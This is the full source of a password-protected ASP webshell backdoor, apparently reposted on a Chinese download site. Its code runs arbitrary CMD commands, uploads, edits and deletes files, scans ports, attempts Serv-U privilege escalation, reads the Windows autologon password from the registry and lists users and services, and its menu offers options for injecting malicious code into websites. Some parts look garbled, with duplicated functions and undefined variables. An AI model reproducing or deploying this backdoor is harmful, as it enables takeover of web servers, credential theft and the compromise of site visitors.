圆月山庄资源网 Design By www.vgjia.com
<%
Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next
UserPass="643617" '密码
mName="BY:.尐飛" '后门名字
Copyright="注:请勿用于非法用途,否则后果作者概不负责" '版权
Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next
sub ShowErr()
If Err Then
RRS"<br><a href='javascript:history.back()'><br> " &
Err.Description & "</a><br>"
Err.Clear:Response.Flush
End If
end sub
Sub RRS(str)
response.write(str)
End Sub
Function RePath(S)
RePath=Replace(S,"\","\\")
End Function
Function RRePath(S)
RRePath=Replace(S,"\\","\")
End Function
URL=Request.ServerVariables("URL")
ServerIP=Request.ServerVariables("LOCAL_ADDR")
Action=Request("Action")
RootPath=Server.MapPath(".")
WWWRoot=Server.MapPath("/")
serveru=request.servervariables("http_host")&url
serverp=userpass
FolderPath=Request("FolderPath")
FName=Request("FName")
BackUrl="<br><br><center><a href='javascript:history.back()'>返回
</a></center>"
RRS"<html><meta http-equiv=""Content-Type"" content=""text/html;
charset=gb2312"">"
RRS"<title>"&mName1&" - "&ServerIP&" </title>"
RRS"<style type=""text/css"">"
RRS"body,td{font-size: 12px;background-color:#000000;color:#eee;}"
RRS"input,select,textarea{font-size: 12px;background-
color:#ddd;border:1px solid #fff}"
RRS".C{background-color:#000000;border:0px}"
RRS".cmd{background-color:#000;color:#FFF}"
RRS"body{margin: 0px;margin-left:4px;}"
RRS"a{color:#ddd;text-decoration: none;}a:hover
{color:red;background:#000}"
RRS".am{color:#888;font-size:11px;}"
RRS"</style>"
RRS"<script language=javascript>function killErrors(){return true;}
window.onerror=killErrors;"
RRS"function yesok(){if (confirm(""确认要执行此操作吗?""))return
true;else return false;}"
RRS"function runClock(){theTime = window.setTimeout(""runClock()"",
100);var today = new Date();var display= today.toLocaleString
();window.status=""→"&AD&" --""+display;}runClock();"
RRS"function ShowFolder(Folder){top.addrform.FolderPath.value =
Folder;top.addrform.submit();}"
RRS"function FullForm(FName,FAction){top.hideform.FName.value =
FName;if(FAction==""CopyFile""){DName = prompt(""请输入复制到目标文件全
名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""MoveFile""){DName = prompt(""请输入移动到目标文件全名
称"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""CopyFolder""){DName = prompt(""请输入移动到目标文件夹全名称
"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""MoveFolder""){DName = prompt(""请输入移动到目标文件夹全名称
"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""NewFolder""){DName = prompt(""请输入要新建的文件夹全名
称"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}
if(DName!=null){top.hideform.Action.value =
FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}"
RRS"</script>"
rrs "<body"
If Action="" then RRS " scroll=no"
rrs ">"
Dim ObT(13,2)
ObT(0,0) = "Scripting.FileSystemObject"
ObT(0,2) = "文件操作组件"
ObT(1,0) = "wscript.shell"
ObT(1,2) = "命令行执行组件"
ObT(2,0) = "ADOX.Catalog"
ObT(2,2) = "ACCESS建库组件"
ObT(3,0) = "JRO.JetEngine"
ObT(3,2) = "ACCESS压缩组件"
ObT(4,0) = "Scripting.Dictionary"
ObT(4,2) = "数据流上传辅助组件"
ObT(5,0) = "Adodb.connection"
ObT(5,2) = "数据库连接组件"
ObT(6,0) = "Adodb.Stream"
ObT(6,2) = "数据流上传组件"
ObT(7,0) = "SoftArtisans.FileUp"
ObT(7,2) = "SA-FileUp 文件上传组件"
ObT(8,0) = "LyfUpload.UploadFile"
ObT(8,2) = "刘云峰文件上传组件"
ObT(9,0) = "Persits.Upload.1"
ObT(9,2) = "ASPUpload 文件上传组件"
ObT(10,0) = "JMail.SmtpMail"
ObT(10,2) = "JMail 邮件收发组件"
ObT(11,0) = "CDONTS.NewMail"
ObT(11,2) = "虚拟SMTP发信组件"
ObT(12,0) = "SmtpMail.SmtpMail.1"
ObT(12,2) = "SmtpMail发信组件"
ObT(13,0) = "Microsoft.XMLHTTP"
ObT(13,2) = "数据传输组件"
For i=0 To 13
Set T=Server.CreateObject(ObT(i,0))
If -2147221005 <> Err Then
IsObj=" √"
Else
IsObj=" ×"
Err.Clear
End If
Set T=Nothing
ObT(i,1)=IsObj
Next
If FolderPath<>"" then
Session("FolderPath")=RRePath(FolderPath)
End If
If Session("FolderPath")="" Then
FolderPath=RootPath
Session("FolderPath")=FolderPath
End if
Function MainForm()
RRS"<form name=""hideform"" method=""post"" action="""&URL&"""
target=""FileFrame"">"
RRS"<input type=""hidden"" name=""Action"">"
RRS"<input type=""hidden"" name=""FName"">"
RRS"</form>"
RRS"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
RRS"<tr><td height='30' colspan='2'>"
RRS"<table width='100%'>"
RRS"<form name='addrform' method='post' action='"&URL&"'
target='_parent'>"
RRS"<tr><td width='60' align='center'>地址栏:</td><td>"
RRS"<input name='FolderPath' style='width:100%' value='"&Session
("FolderPath")&"'>"
RRS"</td><td width='140' align='center'><input name='Submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='FileFrame.location.reload()'>"
RRS"</td></tr></form></table></td></tr><tr><td width='170'>"
RRS"<iframe name='Left' src='?Action=MainMenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
RRS"<td>"
RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%'
height='100%' frameborder='1'></iframe>"
RRS"</td></tr></table>"
End Function
if request("web")="admin" then
Session("web2a2dmin") = UserPass
URL()
end if
Function MainForm()
RRS"<form name=""hideform"" method=""post"" action="""&URL&"""
target=""FileFrame"">"
RRS"<input type=""hidden"" name=""Action"">"
RRS"<input type=""hidden"" name=""FName"">"
RRS"</form>"
RRS"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
RRS"<tr><td height='30' colspan='2'>"
RRS"<table width='100%'>"
RRS"<form name='addrform' method='post' action='"&URL&"'
target='_parent'>"
RRS"<tr><td width='60' align='center'>地址栏:</td><td>"
RRS"<input name='FolderPath' style='width:100%' value='"&Session
("FolderPath")&"'>"
RRS"</td><td width='140' align='center'><input name='Submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='FileFrame.location.reload()'>"
RRS"</td></tr></form></table></td></tr><tr><td width='170'>"
RRS"<iframe name='Left' src='?Action=MainMenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
RRS"<td>"
RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%'
height='100%' frameborder='1'></iframe>"
RRS"</td></tr></table>"
End Function
Function MainMenu()
RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
RRS"<tr><td height='5'></td></tr>"
RRS"<tr><td><center><a href='"&SiteURL2&"' target='_blank'><font
color=red>"&mName2&"</font></center></a><hr hight=1 width='100%'>"
RRS"</td></tr>"
If ObT(0,1)=" ×" Then
RRS"<tr><td height='24'>无权限</td></tr>"
Else
RRS"<tr><td height=22 onmouseover=""menu1.style.display=''""> ↓查看硬
盘<div id=menu1 style=""width:100%;display='none'""
onmouseout=""menu1.style.display='none'"">"
Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
RRS"</div></td></tr><tr><td height='20'><a href='javascript:ShowFolder
("""&RePath(WWWRoot)&""")'>->站点根目录</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath
(RootPath)&""")'>→本程序目录</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Program
Files"")'>→Program Files</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents
and Settings\\All Users\\Documents"")'>->Documents</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents
and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere"")'>-
>pcAnywhere</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents
and Settings\\All Users\\「开始」菜单\\程序"")'>->开始 <b>→</b> 程序
<hr></a></td></tr>"
End If
RRS"<tr><td height='22'><a href='?Action=Course' target='FileFrame'>→
系统服务-用户账号</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=getTerminalInfo'
target='FileFrame'>→终端端口-自动登录</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ServerInfo'
target='FileFrame'>→服务信息-组件支持</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cmd1Shell' target='FileFrame'>
→执行CMD命令</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ScanPort' target='FileFrame'>
→端口扫描器</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Servu' target='FileFrame'>→
Serv-u提权</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ReadREG' target='FileFrame'>→
读取注册表</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath
(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>→新建目录
<hr></a></td></tr>"
RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>
→新建文本</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=UpFile' target='FileFrame'>→
上传文件</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=kmuma' target='FileFrame'>→查
找木马</b></a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=1' target='FileFrame'>
→高级挂马</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=2' target='FileFrame'>
→批量清马</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=3' target='FileFrame'>
→批量替换</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=plgm' target='FileFrame'></b>
→低级挂马</a></b></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Logout' target='_top'>→退出登
录</a></td></tr>"
RRS"<tr><td align=center
style='color:red'><hr>"&Copyright2&"</td></tr></table>"
RRS"</table>"
End Function
Sub unPack(thePath)
On Error Resume Next
Server.ScriptTimeOut = 5000
Dim rs, ws, str, conn, stream, connStr, theFolder
str = Server.MapPath(".") & "\"
Set rs = CreateObject("ADODB.RecordSet")
Set stream = CreateObject("ADODB.Stream")
Set conn = CreateObject("ADODB.Connection")
connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=" & thePath & ";"
conn.Open connStr
rs.Open "FileData", conn, 1, 1
stream.Open
stream.Type = 1
Do Until rs.Eof
theFolder = Left(rs("thePath"), InStrRev(rs
("thePath"), "\"))
If fsoX.FolderExists(str & theFolder) = False
Then
createFolder(str & theFolder)
End If
stream.SetEos()
stream.Write rs("fileContent")
stream.SaveToFile str & rs("thePath"), 2
rs.MoveNext
Loop
rs.Close
conn.Close
stream.Close
Set ws = Nothing
Set rs = Nothing
Set stream = Nothing
Set conn = Nothing
End Sub
Sub createFolder(thePath)
Dim i
i = Instr(thePath, "\")
Do While i > 0
If fsoX.FolderExists(Left(thePath, i)) = False
Then
fsoX.CreateFolder(Left(thePath, i - 1))
End If
If InStr(Mid(thePath, i + 1), "\") Then
i = i + Instr(Mid(thePath, i + 1), "\")
Else
i = 0
End If
Loop
End Sub
Function Course()
SI="<br><table width='600' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>系
统用户与服务</td></tr>"
on error resume next
for each obj in getObject("WinNT://.")
err.clear
if OBJ.StartType="" then
SI=SI&"<tr>"
SI=SI&"<td height=""20"" bgcolor=""#FFFFFF""> "
SI=SI&obj.Name
SI=SI&"</td><td bgcolor=""#FFFFFF""> "
SI=SI&"系统用户(组)"
SI=SI&"</td></tr>"
SI0="<tr><td height=""20"" bgcolor=""#FFFFFF""
colspan=""2""> </td></tr>"
end if
if OBJ.StartType=2 then lx="自动"
if OBJ.StartType=3 then lx="手动"
if OBJ.StartType=4 then lx="禁用"
if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
SI1=SI1&"<tr><td height=""20""
bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20""
bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20""
bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]<font
color=#FF0000> "&obj.path&"</font></td></tr>"
else
SI2=SI2&"<tr><td height=""20""
bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20""
bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20""
bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]<font
color=#3399FF> "&obj.path&"</font></td></tr>"
end if
next
RRS SI&SI0&SI1&SI2&"</table>"
End Function
Function ServerInfo()
SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>服
务器组件信息</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器名</td><td bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr>"
SI=SI&"<form method=post action='http://www.ip138.com/index.asp'
name='ipform' target='_blank'><tr align='center'><td height='20'
width='200' bgcolor='#FFFFFF'>服务器IP</td><td
bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"
SI=SI&"<input type='text' name='ip' size='15'
value='"&Request.ServerVariables("LOCAL_ADDR")
&"'style='border:0px'><input type='submit' value='查
询'style='border:0px'><input type='hidden' name='action'
value='2'></td></tr></form>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器时间</td><td bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&now&" </td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器CPU数量</td><td
bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")
&"</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器操作系统</td><td
bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>WEB服务器版本</td><td
bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")
&"</td></tr>"
For i=0 To 13
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)
&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
Next
RRS SI
End Function
Function DownFile(Path)
Response.Clear
Set OSM = CreateObject(ObT(6,0))
OSM.Open
OSM.Type = 1
OSM.LoadFromFile Path
sz=InstrRev(path,"\")+1
Response.AddHeader "Content-Disposition", "attachment; filename=" &
Mid(path,sz)
Response.AddHeader "Content-Length", OSM.Size
Response.Charset = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite OSM.Read
Response.Flush
OSM.Close
Set OSM = Nothing
End Function
Function HTMLEncode(S)
if not isnull(S) then
S = replace(S, ">", ">")
S = replace(S, "<", "<")
S = replace(S, CHR(39), "'")
S = replace(S, CHR(34), """)
S = replace(S, CHR(20), " ")
HTMLEncode = S
end if
End Function
Function UpFile()
If Request("Action2")="Post" Then
Set U=new UPC : Set F=U.UA("LocalFile")
UName=U.form("ToPath")
If UName="" Or F.FileSize=0 then
SI="<br>请输入上传的完全路径后选择一个文件上传!"
Else
F.SaveAs UName
If Err.number=0 Then
SI="<center><br><br><br>文件"&UName&"上传成功!</center>"
End if
End If
Set F=nothing:Set U=nothing
SI=SI&BackUrl
RRS SI
ShowErr()
Response.End
End If
SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0'
align='center'>"
SI=SI&"<form name='UpForm' method='post' action='"&URL&"?
Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
SI=SI&"<tr><td>"
SI=SI&"上传路径:<input name='ToPath' value='"&RRePath(Session
("FolderPath")&"\diy3.asp")&"' size='40'>"
SI=SI&" <input name='LocalFile' type='file' size='25'>"
SI=SI&" <input type='submit' name='Submit' value='上传'>"
SI=SI&"</td></tr></form></table>"
RRS SI
End Function
Function Cmd1Shell()
checked=" checked"
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "diy3.asp"
if Request("wscript")<>"yes" then checked=""
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI="<form method='post'>"
SI=SI&"SHELL路径:<input name='SP' value='"&ShellPath&"'
Style='width:70%'> "
SI=SI&"<input class=c type='checkbox' name='wscript'
value='yes'"&checked&">WScript.Shell"
SI=SI&"<input name='cmd' Style='width:92%' value='"&DefCmd&"'> <input
type='submit' value='执行'><textarea Style='width:100%;height:440;'
class='cmd'>"
If Request.Form("cmd")<>"" Then
if Request.Form("wscript")="yes" then
Set CM=CreateObject(ObT(1,0))
Set DD=CM.exec(ShellPath&" /c "&DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa
else
On Error Resume Next
Set ws=Server.CreateObject("WScript.Shell")
Set ws=Server.CreateObject("WScript.Shell")
Set fso=Server.CreateObject("Scripting.FileSystemObject")
szTempFile = server.mappath("cmd.txt")
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("Scripting.FileSystemObject")
Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
aaa=Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call fso.DeleteFile(szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&"</textarea></form>"
RRS SI
End Function
if session("web2a2dmin")<>UserPass then
if request.form("pass")<>"" then
if request.form("pass")=UserPass then
session("web2a2dmin")=UserPass
response.redirect url
else
rrs"<br><br><br><b><div align=center><font size='14' color='red'>注:
请勿用于非法用途,否则后果自负!!!</font></b> <br><br><br><br><b><div
align=center><font size='14' color='lime'>HACK by:漫步云端
</font></b></p>"
end if
else
si="<center><div style='width:500px;border:1px solid
#222;padding:22px;margin:100px;'><br><a href='"&SiteURL&"'
target='_blank'>"&mname&"</a><hr><form action='"&url&"' method='post'>
密码:<input name='pass' type='password' size='22'> <input
type='submit' value='登录'><hr>"&Copyright&"</center>"
if instr(SI,SIC)<>0 then rrs sI
end if
response.end
end if
Dim T1
Class UPC
Dim D1,D2
Public Function Form(F)
F=lcase(F)
If D1.exists(F) then:Form=D1(F):else:Form="":end if
End Function
Public Function UA(F)
F=lcase(F)
If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
End Function
Private Sub Class_Initialize
Dim
TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
set D1=CreateObject(ObT(4,0))
if Request.TotalBytes<1 then Exit Sub
set T1 = CreateObject(ObT(6,0))
T1.Type = 1 : T1.Mode =3 : T1.Open
T1.Write Request.BinaryRead(Request.TotalBytes)
T1.Position=0 : TDa =T1.Read : DStart = 1
DEnd = LenB(TDa)
set D2=CreateObject(ObT(4,0))
vbCrlf = chrB(13) & chrB(10)
set T2 = CreateObject(ObT(6,0))
TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
TLen = LenB (TSt)
DStart=DStart+TLen+1
while (DStart + 10) < DEnd
DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
T2.Type = 1 : T2.Mode =3 : T2.Open
T1.Position = DStart
T1.CopyTo T2,DIEnd-DStart
T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
TIn = T2.ReadText : T2.Close
DStart = InStrB(DIEnd,TDa,TSt)
FStart = InStr(22,TIn,"name=""",1)+6
FEnd = InStr(FStart,TIn,"""",1)
UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
if InStr (45,TIn,"filename=""",1) > 0 then
set TFL=new FIF
FStart = InStr(FEnd,TIn,"filename=""",1)+10
FEnd = InStr(FStart,TIn,"""",1)
FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
FEnd = InStr(FStart,TIn,vbCr)
TFL.FileStart =DIEnd
TFL.FileSize = DStart -DIEnd -3
if not D2.Exists(UpName) then
D2.add UpName,TFL
end if
else
T2.Type =1 : T2.Mode =3 : T2.Open
T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
T2.Position = 0 : T2.Type = 2
T2.Charset ="gb2312"
SFV = T2.ReadText
T2.Close
if D1.Exists(UpName) then
D1(UpName)=D1(UpName)&", "&SFV
else
D1.Add UpName,SFV
end if
end if
DStart=DStart+TLen+1
wend
TDa=""
set T2 =nothing
End Sub
Private Sub Class_Terminate
if Request.TotalBytes>0 then
D1.RemoveAll:D2.RemoveAll
set D1=nothing:set D2=nothing
T1.Close:set T1 =nothing
end if
End Sub
End Class
Class FIF
dim FileSize,FileStart
Private Sub Class_Initialize
FileSize = 0
FileStart= 0
End Sub
Public function SaveAs(F)
dim T3
SaveAs=true
if trim(F)="" or FileStart=0 then exit function
set T3=CreateObject(ObT(6,0))
T3.Mode=3 : T3.Type=1 : T3.Open
T1.position=FileStart
T1.copyto T3,FileSize
T3.SaveToFile F,2
T3.Close
set T3=nothing
SaveAs=false
end function
End Class
Class LBF
Dim CF
Private Sub Class_Initialize
SET CF=CreateObject(ObT(0,0))
End Sub
Private Sub Class_Terminate
Set CF=Nothing
End Sub
Function ShowDriver()
For Each D in CF.Drives
RRS" <a href='javascript:ShowFolder
("""&D.DriveLetter&":\\"")'>本地磁盘 ("&D.DriveLetter&":)</a><br>"
Next
End Function
Function Show1File(Path)
Set FOLD=CF.GetFolder(Path)
i=0
SI="<table width='100%' border='0' cellspacing='0'
cellpadding='0'><tr>"
For Each F in FOLD.subfolders
SI=SI&"<td height=10>"
SI=SI&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)
&""")' title=""打开""><font face='wingdings'
size='6'>0</font>"&F.Name&"</a>"
SI=SI&" _<a href='javascript:FullForm("""&RePath
(Path&"\"&F.Name)&""",""CopyFolder"")' onclick='return yesok()'
class='am' title='复制'>复制</a>"
SI=SI&" <a href='javascript:FullForm("""&Replace
(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")' onclick='return yesok
()' class='am' title='删除'>删除</a>"
SI=SI&" <a href='javascript:FullForm("""&RePath
(Path&"\"&F.Name)&""",""MoveFolder"")' onclick='return yesok()'
class='am' title='移动'>移动</a>"
SI=SI&" <a href='javascript:FullForm("""&RePath
(Path&"\"&F.Name)&""",""DownFile"")' onclick='return yesok()'
class='am' title='下载'>下载</a></td>"
i=i+1
If i mod 3 = 0 then SI=SI&"</tr><tr>"
Next
SI=SI&"</tr><tr><td height=2></td></tr></table>"
RRS SI &"<hr noshade color=""#CCCCCC"" size=1 color=""#"" />" :
SI=""
For Each L in Fold.files
SI="<table width='100%' border='0' cellspacing='0'
cellpadding='0'>"
SI=SI&"<tr style='boungroup-color:#'>"
SI=SI&"<td height='30'><a href='javascript:FullForm("""&RePath
(Path&"\"&L.Name)&""",""DownFile"");' title='下载'><font
face='wingdings' size='4'>2</font>"&L.Name&"</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""EditFile"")' class='am' title='编辑'>编辑</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""CopyFile"")' class='am' title='复制'>复制</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""MoveFile"")' class='am' title='移动'>移动</a></td>"
SI=SI&"<td width='50' align=""center"">"&clng(L.size/1024)&"K</td>"
SI=SI&"<td width='200' align=""center"">"&L.Type&"</td>"
SI=SI&"<td width='160'>"&L.DateLastModified&"</td>"
SI=SI&"</tr></table>"
RRS SI:SI=""
Next
Set FOLD=Nothing
End function
Function DelFile(Path)
If CF.FileExists(Path) Then
CF.DeleteFile Path
SI="<center><br><br><br>文件 "&Path&" 删除成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
Function EditFile(Path)
If Request("Action2")="Post" Then
Set T=CF.CreateTextFile(Path)
T.WriteLine Request.form("content")
T.close
Set T=nothing
SI="<center><br><br><br>文件保存成功!</center>"
SI=SI&BackUrl
RRS SI
Response.End
End If
If Path<>"" Then
Set T=CF.opentextfile(Path, 1, False)
Txt=HTMLEncode(T.readall)
T.close
Set T=Nothing
Else
Path=Session("FolderPath")&"\newfile.asp":Txt="新建文件"
End If
SI=SI&"<Form action='"&URL&"?Action2=Post' method='post'
name='EditForm'>"
SI=SI&"<input name='Action' value='EditFile' Type='hidden'>"
SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>"
SI=SI&"<textarea name='Content'
style='width:100%;height:450'>"&Txt&"</textarea><br>"
SI=SI&"<hr><input name='goback' type='button' value='返回'
onclick='history.back();'> <input name='reset'
type='reset' value='重置'> <input name='submit'
type='submit' value='保存'></form>"
RRS SI
End Function
Function CopyFile(Path)
Path = Split(Path,"||||")
If CF.FileExists(Path(0)) and Path(1)<>"" Then
CF.CopyFile Path(0),Path(1)
SI="<center><br><br><br>文件"&Path(0)&"复制成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
Function MoveFile(Path)
Path = Split(Path,"||||")
If CF.FileExists(Path(0)) and Path(1)<>"" Then
CF.MoveFile Path(0),Path(1)
SI="<center><br><br><br>文件"&Path(0)&"移动成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
Function DelFolder(Path)
If CF.FolderExists(Path) Then
CF.DeleteFolder Path
SI="<center><br><br><br>目录"&Path&"删除成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
Function CopyFolder(Path)
Path = Split(Path,"||||")
If CF.FolderExists(Path(0)) and Path(1)<>"" Then
CF.CopyFolder Path(0),Path(1)
SI="<center><br><br><br>目录"&Path(0)&"复制成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
Function MoveFolder(Path)
Path = Split(Path,"||||")
If CF.FolderExists(Path(0)) and Path(1)<>"" Then
CF.MoveFolder Path(0),Path(1)
SI="<center><br><br><br>目录"&Path(0)&"移动成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
Function NewFolder(Path)
If Not CF.FolderExists(Path) and Path<>"" Then
CF.CreateFolder Path
SI="<center><br><br><br>目录"&Path&"新建成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
End Class
sub getTerminalInfo()
On Error Resume Next
Set wsX = Server.CreateObject("WScript.Shell")
Dim terminalPortPath, terminalPortKey, termPort
Dim autoLoginPath, autoLoginUserKey, autoLoginPassKey
Dim isAutoLoginEnable, autoLoginEnableKey, autoLoginUsername,
autoLoginPassword
terminalPortPath = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp\"
terminalPortKey = "PortNumber"
termPort = wsX.RegRead(terminalPortPath & terminalPortKey)
RRS "终端服务端口及自动登录<hr/><ol>"
If termPort = "" Or Err.Number <> 0 Then
RRS"无法得到终端服务端口, 请检查权限是否已经受到限制.<br/>"
Else
RRS "当前终端服务端口: " & termPort & "<br/>"
End If
autoLoginPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\"
autoLoginEnableKey = "AutoAdminLogon"
autoLoginUserKey = "DefaultUserName"
autoLoginPassKey = "DefaultPassword"
isAutoLoginEnable = wsX.RegRead(autoLoginPath & autoLoginEnableKey)
If isAutoLoginEnable = 0 Then
RRS "系统自动登录功能未开启<br/>"
Else
autoLoginUsername = wsX.RegRead(autoLoginPath & autoLoginUserKey)
RRS "自动登录的系统帐户: " & autoLoginUsername & "<br>"
autoLoginPassword = wsX.RegRead(autoLoginPath & autoLoginPassKey)
If Err Then
Err.Clear
RRS "False"
End If
RRS "自动登录的帐户密码: " & autoLoginPassword & "<br>"
End If
RRS "</ol>"
End Sub
sub ReadREG()
RRS "注册表键值读取:<hr/>"
RRS "<form method=post>"
RRS "<input type=hidden value=readReg name=theAct>"
RRS "<input name=thePath
value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\
ComputerName' size=80>"
RRS " <input type=submit value=' 读取 '>"
RRS "<span id=regeditInfo style='display:none;'><hr/>"
RRS "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-
DisplayLastUserName,REG_SZ,1 {不显示上次登录用户}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,
0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机IPC$共享
}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoSha
reServer,REG_DWORD,0 {禁止默认共享}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableS
haredNetDrives,REG_SZ,0 {关闭网络共享}<br/>"
RRS
"HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurity
Filters,REG_DWORD,1 {启用TCP/IP筛选(所有试配器)}<br/>"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 {允许IP路由}
<br/>"
